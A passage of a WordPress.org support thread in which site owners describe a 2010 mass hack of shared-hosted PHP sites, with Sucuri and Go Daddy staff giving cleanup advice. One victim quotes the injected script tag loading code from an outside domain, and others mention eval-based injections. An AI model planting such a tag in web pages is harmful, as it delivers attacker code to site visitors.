WordPress.org

Support

Support » How-To and Troubleshooting » 2.9.2 site hacked

2.9.2 site hacked

  • I visited my WP 2.9.2 site today to get a warning about my site having malware associated with it. Looking at the source, I see a script entry in the HTML body going to http://zettapetta.com/js.php

    Looking at the index.php file, I see that the first line has been hacked with an eval command and a lot of garbage that obviously comprises part of the hack. The timestamps of a lot of WP files has been changed, indicating that they were modified sometime yesterday afternoon.

    Anyone else seen this hack yet; is there a fix? I only found one or two mentions of this online, but all my plugins are up to date and I’m not sure how to ensure this won’t happen again after I do a restore from backup on the site.

    Thanks,
    Matt

Viewing 15 replies - 16 through 30 (of 187 total)
  • Daniel Cid

    @ddsucurinet

    Sucuri.net Support

    clundie: wow… On a site without wordpress?

    Yes, never had WordPress installed on my site. Just a few .php files written by me, on a mostly static site. I don’t have scripts to allow file uploads or anything like that. All the .php files got modified as described above. Now – my site is on shared hosting, so it’s possible there was a WordPress site was hosted on the same server. My file permissions were set so that only I (the owner) could write/modify them, but maybe someone figured out how to bypass that. In any case I changed all my passwords, which were strong and unique. I also use a Mac & there is zero chance of a virus on it. Ironically I was already planning to leave Godaddy next week.

    This script has been placed somewhere in the code that pulls my rss feed and I can’t find it. Help!

    <script src=”http://indesignstudioinfo.com/ls.php”></script>

    If you try to pull my feed, that’s the error you get (www.thenewpioneersquare.com/feed) and I can’t find the file that the code is in. I’ve fixed all of my other files, but this is nowhere.

    Does anyone know where I can find the file to remove this code? I’ve been looking in files for the past 2 hours and have found nothing so far.

    Thanks!!!!

    Moderator James Huff

    @macmanx

    from what i read on the other forums chmod-ing the files to non ‘open’ should help.

    FTP and File Manager access down now at NS. At least on our server. Can’t access my own files.

    Says my own password and user ID is incorrect.

    Total chaos.

    Daniel Cid

    @ddsucurinet

    Sucuri.net Support

    jkelly11: This file is hidden from an encoded PHP string on all your files.

    You can get more info here:
    http://sucuri.net/malware/entry/MW:MROBH:1

    Be cautious people have been getting infected just by checking their own sites.

    Thanks @dd — I’ve deleted a lot of that code in the php string (in my case, it infected all of my .php) files, so I don’t understand why I’m still getting the error on my rss feed.

    Are you not able to just delete the inserted code and clean it up?

    I’m a little nervous to do the whole backup, erase, redo (because of how new I am to wordpress). I was hoping to take care of it by just finding the code.

    dd@sucuri.net

    The problem is the criminals are launching everything in the book at us. It’s like dodging bullets at this point. You clean up, and then another surprise shows up out of nowhere totally unrelated to the previous hack and a completely new technique.

    They are getting a hold of and compromising everything. Mail, FTP, Site, etc., etc.

    And who the heck knows what else at this point.

    Daniel Cid

    @ddsucurinet

    Sucuri.net Support

    jkelly11: You probably missed a file or two. Specially inside the themes, wp-includes or plugins. Shoot me an email and I can send an script to automatically do it for you.

    Error: Authentication failed.
    Error: Critical error
    Error: Could not connect to server

    Obviously you can’t check and try to protect your web site assets either when SFTP returns this all day.

    Go Daddy

    @gdhosting

    Go Daddy Support

    @clundie
    This is not necessarily specific to WordPress, that’s just one of the more popular apps. The real concern is insecure PHP code, which is more likely to exist in apps that haven’t been properly updated.

    If there’s another installation that’s been exploited in the same hosting account, it could affect your other sites, but not across accounts or across customers on the same server.

    Our security team can take a look by submitting your information here: http://fwd4.me/Mrd

    Alicia

    Daniel Cid

    @ddsucurinet

    Sucuri.net Support

    Hey all,

    Simple script to automatically clean this up for you:

    http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

    I just cleaned a few sites using it and takes less then 5 minutes.

    Worked a little bit. Please check the comment I left on your post. Thanks!

Viewing 15 replies - 16 through 30 (of 187 total)
  • The topic ‘2.9.2 site hacked’ is closed to new replies.
Skip to toolbar